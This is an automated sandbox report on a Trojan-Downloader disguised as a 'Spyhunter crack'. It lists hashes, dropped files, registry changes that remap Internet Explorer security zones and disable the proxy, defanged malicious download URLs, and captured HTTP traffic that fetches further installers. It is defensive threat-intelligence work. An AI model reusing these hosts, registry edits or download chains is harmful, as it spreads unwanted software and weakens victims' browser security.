Trojan.NSIS.StartPage_766335e9fd
Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 766335e9fdc1757be89a53f892fa9de8
SHA1: d1cc8b41b8f3b91e5dbd080bffc179ced4bd87b3
SHA256: c43957cea4d5e84d9b0ec32487c8c6f59204f7b5175bcb36eb88d6e2ad8c48fc
SSDeep: 98304:sZ1WQDXjyTr47T8VH8wvSt0I/kPLZQBPqWumDKl:uhbus10I8jZ Kl
Size: 6558854 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
Htf9HUBEiO.exe:704
cpSetup.exe:1620
%original file name%.exe:1988
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Htf9HUBEiO.exe:704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\cpSetup.exe (20479 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\731628514 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\NSISdl.dll (15 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa3.tmp (0 bytes)
The process cpSetup.exe:1620 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\00115215.a (1730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\001147d4.a (76 bytes)
The process %original file name%.exe:1988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\Rtcf1VkJ8g (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\Htf9HUBEiO.exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\5717a811a2c0c[1].exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
Registry activity
The process Htf9HUBEiO.exe:704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 C6 38 7E 5D A9 B3 90 0A 38 B5 2C 67 76 F6 2F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process cpSetup.exe:1620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A A7 7B B6 C1 CD A2 A2 6D 5D D6 15 55 1D C0 E6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1461083602"
"Name" = "cpSetup.exe"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process %original file name%.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 5B 55 43 70 F1 E6 2F D6 95 0B A9 71 60 10 7D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| ac4344f5a333595847aea38692923097 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\001147d4.a |
| ec79084d2c2d421a41abb101eae15e6a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00115215.a |
| 7caaf58a526da33c24cbe122e7839693 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf4.tmp\NSISdl.dll |
| fe47fe0e4b9216f2f84f8c3c274242e4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf4.tmp\cpSetup.exe |
| 89d40ecddf3ce6f3b0e6a84f40936912 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf4.tmp\nsArray.dll |
| 833ee38631351897967282fc20b0bcc9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh2.tmp\Htf9HUBEiO.exe |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh2.tmp\System.dll |
| c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh2.tmp\inetc.dll |
| 833ee38631351897967282fc20b0bcc9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\5717a811a2c0c[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 233472 | 54888 | 55296 | 3.58388 | 6741c5a36f8b0d57fab028584c5dac1f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 7
9b949cdbe32bfde3d4f5bb5fca26e3cd
92774dbc08dc6dcfe8d338ea0a54e13f
2710b8905d0b8e237a9adf2777cdbe7a
049cf5245604676489465a0678f52854
f96ab4c042207f80ed3c76ddebf57471
7ee056d3ec48f1fed18b2104487a93fd
d0a22a9785c045af43e2d92fc3df8382
URLs
| URL | IP |
|---|---|
| hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=7980238&pid=1505&b_typ=pe&reb=1&name=Spyhunter v 4.15.1.4270 crack [090416BAP] | |
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=1505&tid=7980238&b_typ=pe&n=U3B5aHVudGVyIHYgNC4xNS4xLjQyNzAgY3JhY2sg&reb=1&ic= | |
| hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Spyhunter%20v%204.15.1.4270%20crack%20&s1=1505&s2=7980238&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=7980238&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35447853&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=7980238&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35447853&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.space/offer.php?affId=1006&trackingId=35447853&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&trackingId=35447853&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&trackingId=35447853&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&trackingId=35447853&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365 | |
| hxxp://dl.wold3a.space/stub_maker.php?program=sevenzip&tid=7980238&pid=1505&b_typ=pe&reb=1&name=Spyhunter v 4.15.1.4270 crack [090416BAP] | |
| hxxp://up.afiledownload27.spacehxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&trackingId=35447853&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://get.gribbyk.space/?affId=1006&appTitle=Spyhunter%20v%204.15.1.4270%20crack%20&s1=1505&s2=7980238&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&trackingId=35447853&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/offer.php?affId=1006&trackingId=35447853&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=7980238&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35447853&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=7980238&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35447853&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&trackingId=35447853&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365 | |
| hxxp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=7980238&b_typ=pe&n=U3B5aHVudGVyIHYgNC4xNS4xLjQyNzAgY3JhY2sg&reb=1&ic= |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible Call with No Offset TCP Shellcode
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
Traffic
GET /?affId=1006&appTitle=Spyhunter%20v%204.15.1.4270%20crack%20&s1=1505&s2=7980238&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.gribbyk.space
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 162304
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Wed, 20 Apr 2016 16:02:33 GMT
X-Cache: Miss from cloudfront
Via: 1.1 85c4a5a6503bea202117be835a822b6f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: C4yeq0tq4I3COGD4HFUMyKu0PsBPLccZoMLJaej1WY2JcbyAfAv82A==MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......'O..c..}c..}
c..}n|W}v..}n|h}...}..i}b..}n|i}J..}..C}f..}c..}2..}..m}h..}n|S}b..}c.
.}b..}..V}b..}Richc..}........................PE..L....].W............
..............................@.......................................
@.....................................(....P...S......................
$...................................(...@.............................
...............text...(........................... ..`.rdata...k......
.l..................@[email protected][email protected].
...S...P...T..................@[email protected]..$............d..............
@..B..................................................................
......................................................................
......................................................................
......................................................................
...................................................6B..............6B.
.............6B.......h..A......Y.....h..A..u...Y.....h..A..e...Y.....
.......6B..............6B........K.....6B........{.....6B........k....
.6B..............6B.......j.h..A.d.....P...B.3.P.D$.d.......$B...u'...
..$B.h..A..D$........$B...A............$B..$B..L$.d......Y..........j.
h>.A.d.....P...B.3.P.D$.d.......$B...u'.....$B.h..A..D$........$B..
.A..B.........$B..$B..L$.d......Y..........j.h..A.d.....P...B.3.P.D$.d
.......$B...u'.....$B.h..A..D$........$B...A............$B..$B..L$<<< skipped >>>
GET /launch_v5.php?p=sevenzip&pid=1505&tid=7980238&b_typ=pe&n=U3B5aHVudGVyIHYgNC4xNS4xLjQyNzAgY3JhY2sg&reb=1&ic= HTTP/1.0
Host: up.sdfuus98d7f.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 1159
Connection: close
Date: Wed, 20 Apr 2016 16:02:42 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 2789f57a191cda188474bba6a2541f3a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Fw9-0kDMWUnnoqgT_Xa1lPmxS-_u4Q5d1YpwNJgEHP8H0W3cFsb-aQ==files=4.t1=dl.u1=hXXp://get.gribbyk.space/?affId=1006&appTitle=Spyhunt
er%20v%204.15.1.4270%20crack%20&s1=1505&s2=7980238&setupName=c
pSetup&appVersion=2.92&instId=11.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1
=0.m1=0.d1=0.t2=dl.u2=hXXp://get.file888desktop.info/?p=24718&d=30497&
l=29729&dynamicname=Spyhunter%20v%204.15.1.4270%20crack%20&fil
ename=setup-1228&exeurl=http://d16oc15frjt76r.cloudfront.net/s
etup_ru.exe>=get75&ts=14533669397&con=1&prl=1&d1=7980238&d2=1505.n2=
setup-1228.exe.b2=ru.c2=sevenzip-2.s2=0.m2=1.d2=1500.t3=dl.u3=hXXp://w
ww.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2
140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&pre
fix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appima
geurl]=http://pe-sixi.com/img/icon_installer.png.n3=Setup__2
140_il38.exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d3=0.t4=dl.u4=hXXp://sub
.spirlymo.com/installers/cli/1461164476323/SevenZip_downloader-Q5Iq1oh
G4.exe.n4=SevenZip_downloader-Q5Iq1ohG4.exe.b4=bi.c4=sevenzip-3.s4=0.m
4=1.d4=1500.fn1=Components.fn2=File opener.fn3=File finder.fn4=SevenZi
p.ftitle=to run your file.itype=silent...
POST hXXp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&trackingId=35447853&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 20 Apr 2016 16:02:36 GMT
Connection: close
Content-Length: 344<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org
/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length
Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="t
ext/html; charset=us-ascii"></HEAD>..<BODY><h2>Le
ngth Required</h2>..<hr><p>HTTP Error 411. The reque
st must be chunked or have a content length.</p>..</BODY>&
lt;/HTML>....
POST hXXp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&trackingId=35447853&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Wed, 20 Apr 2016 16:02:50 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 7359b6ad468465a51e7437a7923fda0a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: y4iKBU7Twd-spq-V1dBC9DQNnXaReviKwsXSgwDfULiBR7dO_0TV8g==<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: y4iKBU7Twd-spq
-V1dBC9DQNnXaReviKwsXSgwDfULiBR7dO_0TV8g==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..
GET hXXp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=7980238&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35447853&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=7980238&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35447853&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Wed, 20 Apr 2016 16:02:34 GMT
Connection: close
Content-Length: 586<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=100
6&source=11&aff_sub=1505&aff_sub2=7980238&aff_sub3=0&a
mp;aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.
space/offer.php?affId={aff_id}&trackingId=35447853%2
6instId=11&ho_trackingid={transaction_id}&cc={
;country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&ua
c=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a&
gt;</body>..
GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=7980238&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35447853&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 20 Apr 2016 16:02:48 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up2.dfiledownload28.space/offer.php?affId=1006&trackingId=35447853&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
